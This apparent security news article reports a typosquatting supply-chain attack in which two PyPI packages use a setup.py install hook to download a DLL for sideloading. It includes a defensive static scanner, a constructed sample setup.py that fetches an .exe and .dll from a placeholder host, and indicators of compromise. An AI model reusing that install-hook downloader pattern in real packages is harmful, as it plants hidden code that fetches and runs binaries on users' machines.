Researchers have discovered that threat actors have been using open-source platforms and code for several purposes, such as hosting C2 infrastructure, storing stolen data, and delivering second- and third-stage downloaders or rootkit programs.
Two open-source PyPI packages were found to be used by threat actors to execute code via DLL sideloading as a means of evading security monitoring tools.
The packages were identified as NP6HelperHttptest and NP6HelperHttper.
According to the reports shared with Cyber Security News, open-source ecosystems are used by almost every developer, yet they have no reputation provider to assess the quality and reliability of the code.
This makes it simple for threat actors to insert malicious code into the repositories and perform supply chain attacks.
In addition to this, researchers discovered two attack types that are used in software supply chain attacks, namely typosquatting and repojacking.
The two malicious PyPI packages were involved in typosquatting attacks, as the package names are nearly identical to that of one of the legitimate NP6 packages.
Developers mostly overlook the spelling and consider the packages legitimate, proceeding to use them in development.
Once this is done, threat actors can pivot into the organization and perform malicious activities.
Both of the malicious PyPI packages contained a setup.py script that extends the setuptools command to download two other files: Comserver.exe and dgdeskband64.dll.
Comserver.exe is a legitimate file signed with a valid certificate from Beijing-based Kingsoft Corp, while dgdeskband64.dll is a malicious file that downloads and runs a second-stage payload.
The purpose of Comserver.exe is to load a library, dgdeskband64.dll, and invoke its exported function DllInstall.
However, the dgdeskband64.dll file inside the package is not the legitimate one expected by Comserver.exe.
The threat actors' custom-built dgdeskband64.dll exposes the same DllInstall export function under the disguise of the legitimate dgdeskband64.dll library, resulting in a DLL sideloading attack.
This is done as a means of avoiding detection of the malicious code.
Moreover, execution of the malicious code is achieved by registering an exception handler inside the DllInstall export function.
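As an added example (not code from the original report or from the packages), a defender can review a package's setup.py for the behaviour described above before installing it: the code below parses the file with Python's ast module, never executing it, and flags setuptools command classes registered through cmdclass that call download or process-launch functions or reference .exe/.dll names. The sample input is constructed, example.invalid is a placeholder host, and the list of risky calls is an assumption of this example.

```python
import ast

# Constructed sample, parsed but never executed; example.invalid is a placeholder host.
SAMPLE_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import urllib.request
class CustomInstall(install):
    def run(self):
        for name in ("Comserver.exe", "dgdeskband64.dll"):
            urllib.request.urlretrieve("https://example.invalid/" + name, name)
        install.run(self)

setup(name="demo", version="0.1", cmdclass={"install": CustomInstall})
'''

# Heuristic list of download / process-launch calls (assumption of this example).
RISKY_SUFFIXES = ("urlretrieve", "urlopen", "requests.get", "requests.post",
                  "os.system", "subprocess.Popen", "subprocess.run", "subprocess.call")

def risky_calls(node):
    """Dotted names of download or launch calls anywhere under node."""
    return [ast.unparse(c.func) for c in ast.walk(node)
            if isinstance(c, ast.Call) and ast.unparse(c.func).endswith(RISKY_SUFFIXES)]

def binary_literals(node):
    """String constants under node that name a Windows executable or DLL."""
    return [s.value for s in ast.walk(node)
            if isinstance(s, ast.Constant) and isinstance(s.value, str)
            and s.value.lower().endswith((".exe", ".dll"))]

def scan_setup_py(source):
    """Flag command classes wired in via setup(cmdclass=...) that fetch or launch code."""
    tree = ast.parse(source)
    classes = {n.name: n for n in ast.walk(tree) if isinstance(n, ast.ClassDef)}
    findings = []
    for call in ast.walk(tree):
        if not (isinstance(call, ast.Call) and ast.unparse(call.func).endswith("setup")):
            continue
        for kw in call.keywords:
            if kw.arg != "cmdclass" or not isinstance(kw.value, ast.Dict):
                continue
            for key, val in zip(kw.value.keys, kw.value.values):
                cls = classes.get(getattr(val, "id", None))
                calls, bins = (risky_calls(cls), binary_literals(cls)) if cls else ([], [])
                if calls or bins:
                    findings.append({"command": getattr(key, "value", None),
                                     "class": cls.name, "calls": calls, "binaries": bins})
    return findings
```

A finding is a prompt for manual review, not a verdict: legitimate packages also override install commands, and a setup.py that hides its calls behind encoding or dynamic imports will not match these heuristics.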
A second sample was also found, but it does not exploit DriverGenius' ComServer.exe; instead, it uses a different .exe and the target DLL windowsaccessbridge-64.dll.
However, the functionality of both samples is similar, and the second sample downloads the same payload from the same URL as the PyPI packages.

package_name | version | SHA1 |
NP6HelperHttptest | 0.1 | 1fc236e94b54d3ddc4b2afb8d44a19abd7cf0dd4 |
NP6HelperHttptest | 0.2 | dfc8afe5cb7377380908064551c9555719fd28e3 |
NP6HelperHttptest | 0.3 | 73ece3d738777e791035e9c0c94bf4931baf3e3a |
NP6HelperHttptest | 0.4 | e3a7098e3352fdbb5ff5991e9e10dcf3b43b1b86 |
NP6HelperHttptest | 0.5 | 575bcc28998ad388c2ad2c2ebc74ba583f5c0065 |
NP6HelperHttptest | 0.6 | a1bb4531ce800515afa1357b633c73c27fa305cf |
NP6HelperHttper | 0.1 | a65bce340366f724d444978dcdcd877fa2cacb1c |

description | URI |
Domain that’s hosting the malicious dll | https://fus.rngupdatem[.]buzz |
Domain that’s hosting the shellcode payload | Us.archive-ubuntu.top |

name | type | SHA1 |
dgdeskband.dll | PE/dll | 1f9fcf86a56394a7267d85ba76c1256d12e3e76b |
windowsaccessbridge-64.dll | PE/dll | 84c75536b279a85a5320f058514b884a016bc8c8 |
an.gif | shellcode | 2dc80f45540d0a3ea33830848fcf529f98ea2f5e |